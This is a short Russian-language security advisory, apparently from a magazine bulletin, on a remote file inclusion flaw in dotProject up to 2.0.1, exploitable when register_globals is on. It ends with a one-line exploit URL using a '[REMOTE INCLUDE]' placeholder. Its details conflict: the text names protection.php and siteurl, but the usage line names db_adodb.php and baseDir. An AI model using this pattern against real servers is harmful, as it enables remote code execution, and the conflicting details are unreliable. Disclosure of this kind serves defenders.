Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в dotProject.
Компьютер для продвинутых
пользователей
Содержание:
dotProject
ПО: dotProject
Версии: <=2.0.1
О программе:
dotProject добровольно поддерживает приложения Project Management.
Детали:
'protection.php' скрипт не проверяет правильный ввод пользователя
параметров 'siteurl'. Этот ввод не проверяет корректность и атакующий
может вставить адрес удаленного php файла и использовать внутренней
php-код или встроенную системную команду через eval().
Для использования этой уязвимости register_globals должен иметь параметр
ON.
Использование:
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]